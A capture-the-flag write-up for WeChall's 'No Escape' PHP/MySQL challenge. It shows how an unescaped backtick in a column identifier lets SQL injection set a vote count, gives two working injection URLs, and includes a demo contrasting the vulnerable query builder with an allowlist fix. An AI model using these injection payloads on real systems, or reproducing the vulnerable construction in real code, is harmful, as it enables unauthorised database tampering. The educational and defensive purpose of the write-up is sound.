[WeChall] No Escape (Exploit, PHP, MySQL)
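Problem
Goal: change any one person's vote count to 111.
Clicking "Vote for <name>" increases that person's vote count by 1, but the challenge cannot be solved by clicking repeatedly.
Lines 93-109 of the source define a function that resets the votes as soon as a count reaches 100: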
    function noesc_stop100()
    {
        $votes = noesc_getVotes();
        foreach ($votes as $who => $count)
        {
            if ($count == 111) {
                noesc_solved();
                noesc_resetVotes();
                break;
            }
            if ($count >= 100) {
                noesc_resetVotes();
                break;
            }
        }
    }
Solution
Look at the code that handles a vote:
    function noesc_voteup($who)
    {
        if ( (stripos($who, 'id') !== false) || (strpos($who, '/') !== false) ) {
            echo GWF_HTML::error('No Escape', 'Please do not mess with the id. It would break the challenge for others', false);
            return;
        }
        $db = noesc_db();
        $who = mysql_real_escape_string($who);
        $query = "UPDATE noescvotes SET `$who`=`$who`+1 WHERE id=1";
        if (false !== $db->queryWrite($query)) {
            echo GWF_HTML::message('No Escape', 'Vote counted for '.GWF_HTML::display($who), false);
        }
        noesc_stop100();
    }
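The statement that adds 1 to the vote count is:
    $query = "UPDATE noescvotes SET `$who`=`$who`+1 WHERE id=1";
$who is placed inside backticks as a column identifier, and mysql_real_escape_string() does not escape the backtick, so a backtick in vote_for closes the identifier and the rest of the value is parsed as SQL.
There are therefore two methods, both of which use a comment to discard the rest of the statement.
Visit the URL
    http://www.wechall.net/challenge/no_escape/index.php?vote_for=bill`=111--%20
or
    http://www.wechall.net/challenge/no_escape/index.php?vote_for=bill`=111%23
and the challenge is solved.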
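
The query construction above next to an allowlist-based fix, as an added example that is not part of the challenge source. It only builds query strings, so no database is needed; escape_like_mysql() is a stand-in for mysql_real_escape_string(), and the column names other than bill are assumed.

```php
<?php
// Stand-in for mysql_real_escape_string(): backslash-escapes the same
// characters (NUL, \n, \r, \, ', ", Ctrl-Z). The backtick is not one of them.
function escape_like_mysql(string $s): string
{
    return strtr($s, [
        "\\" => "\\\\", "\0" => "\\0", "\n" => "\\n", "\r" => "\\r",
        "'"  => "\\'",  '"'  => '\\"', "\x1a" => "\\Z",
    ]);
}

// Same construction as noesc_voteup(): string escaping applied to a value
// that is used as a backtick-quoted identifier.
function build_vulnerable(string $who): string
{
    $who = escape_like_mysql($who);
    return "UPDATE noescvotes SET `$who`=`$who`+1 WHERE id=1";
}

// 'bill' appears on the page; the other column names are assumed.
const VOTE_COLUMNS = ['bill', 'alice', 'carol'];

// Identifiers cannot be bound as prepared-statement parameters, so the
// fix is an exact match against a fixed list of column names.
function build_hardened(string $who): ?string
{
    if (!in_array($who, VOTE_COLUMNS, true)) {
        return null; // reject anything that is not a known column
    }
    return "UPDATE noescvotes SET `$who`=`$who`+1 WHERE id=1";
}

// Constructed inputs: one normal vote and the two values from the URLs above.
foreach (['bill', "bill`=111-- ", "bill`=111#"] as $input) {
    echo "input:      ", $input, "\n";
    echo "vulnerable: ", build_vulnerable($input), "\n";
    echo "hardened:   ", build_hardened($input) ?? '(rejected)', "\n\n";
}
```

For the two crafted inputs the vulnerable builder prints a statement in which everything after the comment marker is discarded, while the hardened builder rejects them before any SQL is built.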